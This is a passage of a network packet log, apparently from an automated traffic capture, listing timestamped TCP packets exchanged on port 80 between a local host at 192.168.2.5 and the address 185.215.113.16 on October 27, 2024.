Oct 27, 2024 12:13:17.627022982 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627074957 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.627110958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627226114 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627260923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627286911 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.627386093 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627441883 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.627640009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627695084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627727985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627744913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.627933979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.627983093 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.628046989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.628082037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.628127098 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.670288086 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.670332909 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.670414925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.719069958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.719121933 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.719162941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.719255924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.719414949 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.719414949 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.745372057 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745425940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745486021 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745520115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745557070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745593071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745628119 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745628119 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.745663881 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745695114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.745696068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.745810032 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745866060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745918989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745954037 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.745989084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746036053 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746036053 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746036053 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746126890 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746162891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746187925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746232986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746284008 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746299028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746334076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746387005 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746458054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746906042 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746957064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.746959925 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.746998072 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.747050047 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.788933992 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.788979053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.789233923 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.825784922 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.825836897 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.825877905 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.826086998 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.863862038 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.863909006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.863993883 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864031076 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864067078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864103079 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864140034 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864212990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.864430904 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.864430904 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.864578009 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864633083 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864665985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864716053 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864753962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864883900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864919901 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864948988 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.864948988 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.864954948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.864991903 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865015030 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.865607023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865659952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865672112 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.865700006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865735054 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865751982 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.865771055 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.865822077 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.865936041 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.866158962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.866194963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.866214037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.907164097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.907207966 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.907380104 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.944792986 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.944844961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.944884062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.945131063 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982295036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982321024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982340097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982350111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982494116 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982506037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982506037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982511044 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982526064 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982542038 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982582092 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982615948 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982716084 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982731104 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982775927 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982803106 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982830048 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.982845068 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.982992887 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983009100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983026028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983040094 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.983083963 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.983226061 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983364105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983407974 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.983431101 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983448029 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983489037 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.983596087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983772993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983814955 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.983834028 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983851910 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.983891964 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:17.984005928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.984132051 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.984148979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:17.984174013 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.025824070 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.025870085 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.025891066 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.063224077 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.063249111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.063266993 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.063297987 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.063345909 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.101102114 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101176023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101213932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101248980 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101290941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101305962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101321936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101352930 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.101352930 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.101352930 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.101792097 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101851940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.101888895 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102019072 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102019072 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102086067 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102119923 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102155924 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102176905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102191925 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102241039 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102421045 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102515936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102550983 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102570057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102793932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102828979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102844000 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.102863073 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102899075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.102915049 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.103147984 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.103183985 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.103203058 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.103276968 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.103327990 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.181723118 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.181797981 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.181837082 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.181864023 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.181871891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.181907892 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.181942940 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.182025909 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.182025909 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.219547987 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219619989 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219657898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219692945 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219697952 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.219733953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219772100 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219861984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.219861984 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.219872952 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219908953 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.219959021 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.220448017 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220503092 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220536947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220551968 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.220688105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220722914 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220737934 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.220887899 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220922947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.220938921 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221024036 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221076012 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221079111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221113920 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221162081 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221430063 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221484900 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221518040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221573114 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221605062 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221657991 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221725941 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221760035 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221811056 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.221961975 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.221997023 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.222050905 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.301079988 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.301131964 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.301170111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.301194906 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.301207066 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.301245928 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.301399946 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338378906 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338454962 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338464022 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338493109 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338529110 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338557005 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338565111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338617086 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338618040 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338653088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338700056 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338701963 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338737965 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338783026 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.338793039 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.338959932 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339013100 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339082956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339118958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339169979 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339240074 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339276075 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339344978 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339425087 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339453936 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339508057 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339540958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339579105 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339626074 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339701891 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339736938 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339783907 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.339857101 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339893103 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.339943886 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.340065956 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340145111 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340178967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340193987 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.340213060 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340248108 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340255976 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.340503931 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340538979 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.340559959 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.393776894 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.419550896 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.419673920 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.419713020 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.419877052 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.419914961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.420032024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.420032024 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457196951 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457314014 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457353115 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457412958 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457448006 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457484961 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457496881 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457496881 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457520008 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457555056 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457592010 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457824945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457824945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457824945 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.457864046 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457917929 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457953930 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.457988024 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458023071 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458065987 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458065987 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458071947 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458106995 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458118916 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458141088 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458175898 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458184958 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458304882 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458338976 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458358049 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458374977 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458412886 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458432913 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458694935 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458746910 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.458786011 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458858967 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458893061 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.458906889 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.459011078 CET	80	49712	185.215.113.16	192.168.2.5
Oct 27, 2024 12:13:18.459057093 CET	49712	80	192.168.2.5	185.215.113.16
Oct 27, 2024 12:13:18.459099054 CET	80	49712	185.215.113.16	192.168.2.5
